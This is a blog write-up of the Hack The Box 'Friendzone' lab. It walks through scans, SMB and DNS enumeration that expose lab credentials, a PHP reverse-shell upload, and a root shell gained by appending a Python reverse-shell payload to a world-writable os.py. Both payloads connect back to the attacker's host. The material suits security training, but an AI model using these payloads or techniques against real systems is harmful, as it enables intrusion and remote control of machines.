Hack The Box: Friendzone Write-up (#17)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.123
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • Port 21: — Running FTP service, vsftpd 3.0.3.
  • Port 22: — Running SSH service, OpenSSH 7.6p1 Ubuntu 4
  • Port 53: — Running DNS service, ISC BIND 9.11.3–1ubuntu1.2.
  • Port 80: — Running HTTP service, Apache httpd 2.4.29 ((Debian)).
  • Port 139: — Running Samba smbd 3.X — 4.X.
  • Port 443: — Running HTTPS service, Apache httpd 2.4.29 ((Debian)).
  • Port 445: — Running Samba smbd 4.7.6-Ubuntu.
Nmap scan report for ip-10-10-10-123.ap-southeast-1.compute.internal (10.10.10.123)
Host is up (0.0096s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
nmap -sU -O --top-ports=100 -oA nmap/udp-top100 10.10.10.123
  • -sU: UDP scan
  • Port 53: — Running DNS service.
  • Port 137: — Running NetBIOS service.
Nmap scan report for ip-10-10-10-123.ap-southeast-1.compute.internal (10.10.10.123)
Host is up (0.010s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
53/udp open domain
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
  1. Port 21 FTP service, version vsftpd 3.0.3 and Port 22 SSH service, version OpenSSH 7.6p1 do not have known vulnerabilities. If we found any credentials during enumeration we use them to access these services.
  2. Port 53 is a DNS service. We can enumerate to find possible subdomains if there is any. If there is then we will have another URL to enumerate.
  3. Port 80 and 443 are web services. We need to map the domain of the host to its IP address in our Kali Linux /etc/hosts file. Then we perform brute force of the directories.
  4. Port 139 and 445 belong to Samba service. We will try to enumerate to find if there are any shares enabled to access. If there is we enumerate further to find sensitive info.

Service Enumeration

10.10.10.123    friendzone.red

Port 139,445 (Samba Service)

enum4linux -a 10.10.10.123
smbmap -H 10.10.10.123
  • -H: Target IP
smbmap -H 10.10.10.123 -R --depth 5
root@kali:/htb/Friendzone# smbclient //10.10.10.123/general
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \> exit
root@kali:/htb/Friendzone# cat creds.txt 
creds for the admin THING:
admin:WORKWORKHhallelujah@#

Port 80 (HTTP)

10.10.10.123    friendzone.red friendzoneportal.red

Port 443 (HTTPS Web Service)

Port 53 (DNS Service)

dig axfr @10.10.10.123 friendzone.red
10.10.10.123    admin.friendzoneportal.red administrator1.friendzone.red files.friendzoneportal.red friendzoneportal.red friendzone.red hr.friendzone.red imports.friendzoneportal.red uploads.friendzone.red vpn.friendzoneportal.red
https://admin.friendzoneportal.red
https://administrator1.friendzone.red
https://files.friendzoneportal.red
https://friendzoneportal.red
https://friendzone.red
https://hr.friendzone.red
https://imports.friendzoneportal.red
https://uploads.friendzone.red
https://vpn.friendzoneportal.red
cat hosts.txt | aquatone
aquatone v1.7.0 started at 2020-09-03T08:59:18+08:00Targets    : 9
Threads : 4
Ports : 80, 443, 8000, 8080, 8443
Output dir : .
https://imports.friendzoneportal.red: 404 Not Found
https://friendzone.red: 200 OK
https://administrator1.friendzone.red: 200 OK
https://admin.friendzoneportal.red: 200 OK
https://hr.friendzone.red: 404 Not Found
https://vpn.friendzoneportal.red: 404 Not Found
https://uploads.friendzone.red: 200 OK
https://files.friendzoneportal.red: 404 Not Found
https://friendzoneportal.red: 200 OK
https://imports.friendzoneportal.red: screenshot successful
https://admin.friendzoneportal.red: screenshot successful
https://administrator1.friendzone.red: screenshot successful
https://friendzone.red: screenshot successful
https://vpn.friendzoneportal.red: screenshot successful
https://hr.friendzone.red: screenshot successful
https://files.friendzoneportal.red: screenshot successful
https://uploads.friendzone.red: screenshot successful
https://friendzoneportal.red: screenshot successful
Calculating page structures... done
Clustering similar pages... done
Generating HTML report... done
Writing session file...Time:
- Started at : 2020-09-03T08:59:18+08:00
- Finished at : 2020-09-03T08:59:24+08:00
- Duration : 7s
Requests:
- Successful : 9
- Failed : 0
- 2xx : 5
- 3xx : 0
- 4xx : 4
- 5xx : 0
Screenshots:
- Successful : 9
- Failed : 0
Wrote HTML report to: aquatone_report.html
python3 -m http.server 80
  1. https://admin.friendzoneportal.red
  2. https://administrator1.friendzone.red
  3. https://uploads.friendzone.red
root@kali:/htb/Friendzone# cat test.php 
<?php phpinfo() ?>
root@kali:/htb/Friendzone# smbclient //10.10.10.123/Development
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put test.php
putting file test.php as \test.php (0.6 kb/s) (average 0.6 kb/s)
smb: \>

Exploitation

root@kali:/htb/Friendzone# cp /usr/share/webshells/php/php-reverse-shell.php .
root@kali:/htb/Friendzone# mv php-reverse-shell.php reverse.php
root@kali:/htb/Friendzone# cat revese.php 
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.10'; // CHANGE THIS
$port = 53; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
smb: \> put reverse.php
putting file reverse.php as \revese.php (78.6 kb/s) (average 45.9 kb/s)
root@kali:/htb/Friendzone# nc -nlvp 53
listening on [any] 53 ...
python -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm

Post-Exploitation Enumeration

www-data@FriendZone:/tmp$ find / -name user.txt -type f 2>/dev/null
/home/friend/user.txt
www-data@FriendZone:/tmp$ ls -l /home/friend/user.txt
-r--r--r-- 1 root root 33 Oct 6 2018 /home/friend/user.txt
www-data@FriendZone:/var/www$ cat mysql_data.conf 
for development process this is the mysql creds for user friend
db_user=frienddb_pass=Agpyu12!0.213$db_name=FZ

#1 Privilege Escalation

root@kali:/opt/LinEnum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
friend@FriendZone:/tmp$ wget http://10.10.14.10/lse.sh
--2020-08-31 07:31:51-- http://10.10.14.10/lse.sh
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘lse.sh’
lse.sh 100%[=====================>] 45.54K --.-KB/s in 0.02s2020-08-31 07:31:51 (2.67 MB/s) - ‘lse.sh’ saved [46631/46631]
bash lse.sh -l 1 -i
  • -l: Level of details
  • -i: Non-interactive mode
friend@FriendZone:/tmp$ ls -l /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ wget http://10.10.14.10/pspy64
--2020-09-03 08:51:47-- http://10.10.14.10/pspy64
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.94M 10.0MB/s in 0.3s2020-09-03 08:51:47 (10.0 MB/s) - ‘pspy64’ saved [3078592/3078592]
chmod +x pspy64
./pspy64

Privilege Escalation

...SNIP...
except NameError: # statvfs_result may not exist
pass
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.10",53))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
root@kali:/htb/Friendzone# nc -nlvp 53
listening on [any] 53 ...

Attack Strategy Map

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joshua Surendran

Joshua Surendran

47 Followers

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.